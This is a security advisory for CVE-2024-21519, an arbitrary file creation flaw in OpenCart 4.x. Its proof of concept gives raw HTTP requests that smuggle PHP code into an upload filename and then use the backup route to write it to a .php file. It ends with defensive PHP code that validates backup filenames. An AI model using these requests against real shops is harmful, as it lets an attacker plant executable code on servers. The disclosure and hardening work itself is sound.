Arbitrary File Creation Affecting opencart/opencart package, versions >=4.0.0.0
Snyk ID SNYK-PHP-OPENCARTOPENCART-7266579
- published 21 Jun 2024
- disclosed 17 Jun 2024
- credit Calum Hutton
Introduced: 17 Jun 2024
CVE-2024-21519
How to fix?
There is no fixed version for opencart/opencart.
Overview
opencart/opencart is a shopping cart system.
Affected versions of this package are vulnerable to Arbitrary File Creation. An Arbitrary File Creation issue was identified via the database restoration functionality. By injecting PHP code into the database, an attacker with admin privileges can create a backup file with an arbitrary filename (including the extension) within /system/storage/backup.
Note:
The created file is less likely to be reachable within the web root, because the application's security recommendations suggest moving the storage path outside of the web root.
PoC
All user input ($_GET, $_POST, etc.) is passed through htmlspecialchars at startup, so by default it is stored in the database encoded. There are some places where this isn't the case though, such as the filename parameter of the admin tool/upload.upload route:
POST http://127.0.0.1/opencart/admin/index.php?route=tool/upload.upload&user_token=cd4d0433339a18c414c67e090c96a9f2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------77933938835128784303963783419
Content-Length: 245
Origin: http://127.0.0.1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b
-----------------------------77933938835128784303963783419
Content-Disposition: form-data; name="file"; filename="my_<?php phpinfo() ?>file.png"
Content-Type: image/png
XXX
-----------------------------77933938835128784303963783419--
html_entity_decode is used to decode the input, which allows the htmlspecialchars encoding to be bypassed. This filename data is stored within the oc_upload database table.
By restoring the table and supplying the filename parameter it is possible to write the records to an arbitrary file, i.e. my_script.php:
POST http://127.0.0.1/opencart/admin/index.php?route=tool/backup.backup&user_token=cd4d0433339a18c414c67e090c96a9f2&table=oc_upload&filename=my_script.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 22
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/opencart/admin/index.php?route=tool/backup&user_token=cd4d0433339a18c414c67e090c96a9f2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b
backup%5B%5D=oc_upload
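The filename check the backup route is missing, shown as an added illustration that is not OpenCart's code (the function name, exception class and demo directory are assumptions): the requested name is held to a conservative allow-list with a fixed .sql extension and confined to the backup directory, so a value such as my_script.php is rejected before anything is written.

```php
<?php
declare(strict_types=1);

// Illustrative hardening for a backup-file name taken from user input.
// Not OpenCart's code: names and the demo directory are assumptions.
// Policy: plain basename, conservative character set, fixed .sql
// extension, and the result must resolve inside the backup directory.

final class BackupNameError extends InvalidArgumentException {}

function safeBackupPath(string $requested, string $backupDir): string
{
    // Reject separators, NUL bytes and any user-chosen extension before
    // touching the filesystem; only "<name>.sql" survives this pattern.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.sql\z/', $requested)) {
        throw new BackupNameError('Rejected backup filename: ' . bin2hex($requested));
    }

    $base = realpath($backupDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException("Backup directory does not exist: $backupDir");
    }

    // basename() is belt-and-braces: the regex already excludes '/' and '\'.
    $path = $base . DIRECTORY_SEPARATOR . basename($requested);

    // Containment check against the canonical directory, kept as defence in
    // depth in case the allow-list above is ever relaxed.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new BackupNameError("Backup path escapes $base");
    }
    return $path;
}

// Constructed demonstration against a throwaway temporary directory.
$dir = sys_get_temp_dir() . '/backup_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);

foreach (['my_script.php', '../evil.sql', "x\0.sql", 'shop-2024-06-17.sql'] as $name) {
    try {
        echo 'accepted: ', safeBackupPath($name, $dir), PHP_EOL;
    } catch (BackupNameError $e) {
        echo 'rejected: ', addcslashes($name, "\0..\37"), PHP_EOL;
    }
}
rmdir($dir);
```

Of the four constructed names only shop-2024-06-17.sql is accepted; the PHP-extension name, the traversal attempt and the NUL-byte name are all refused by the allow-list alone.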